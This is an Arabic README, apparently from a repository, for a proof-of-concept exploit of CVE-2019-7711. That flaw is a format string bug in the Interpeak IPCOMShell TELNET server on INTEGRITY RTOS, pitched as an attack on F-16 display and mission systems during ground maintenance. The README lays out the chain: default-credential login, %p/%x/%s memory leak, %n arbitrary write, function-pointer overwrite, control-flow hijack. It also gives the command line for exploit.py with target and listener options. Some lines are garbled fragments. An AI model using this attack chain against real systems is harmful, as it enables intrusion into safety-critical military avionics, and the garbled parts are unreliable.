
سلسلة استغلال كاملة عبر ثغرة تنسيق النص (Format String)
هجوم واقعي على إلكترونيات الطيران لطائرة F-16 أثناء الصيانة الأرضية
يحتوي هذا المستودع على إثبات مفهوم (PoC) لثغرة CVE-2019-7711 — وهي ثغرة تنسيق النص (Format String) في خادم TELNET الخاص بـ Interpeak IPCOMShell (جزء من نظام Green Hills INTEGRITY RTOS 5.0.4).
يُظهر الاستغلال سلسلة هجوم كاملة وواقعية تستهدف معالج شاشات العرض (CDP) وأنظمة المهام في طائرة F-16 Fighting Falcon (Block 60 وما يشابهها) أثناء الصيانة الأرضية.
flowchart TD
A[Start: TELNET Connection\nGround Maintenance Interface] --> B[Login: admin / password]
B --> C[Phase 1: Memory Leak]
C --> D[Send prompt command\nwith %p %x %s payloads]
D --> E[Leak: Stack Addresses, Pointers\n& Task Handlers]
E --> F[Defeat ASLR / Randomization]
F --> G[Phase 2: Arbitrary Memory Write]
G --> H[Send %n Primitive]
H --> I[Overwrite Function Pointer\nor Scheduler Callback]
I --> J[Phase 3: Trigger]
J --> K[Send exit / reboot command]
K --> L[Control Flow Hijack]
L --> M[Potential Code Execution in RTOS Partition]
style A fill:#1a1a1a,stroke:#00ff00
style M fill:#8B0000,stroke:#ffcc00,color:#fff
%npython3 exploit.py <target_ip> [--lhost <your_ip>] [--lport <your_port>]
مثال:
python3 exploit.py 192.168.1.100
%n في المرحلة 2 بناءً على التسريب⭐ امنح هذا المستودع نجمة إذا وجدته مفيدًا لأبحاث الأمن السيبراني في مجال الطيران!
⚠️ ملاحظة قانونية: تستند هذه المعلومات إلى ثغرات معروفة للعامة منذ عام 2019. تُستخدم لأغراض تعليمية فقط.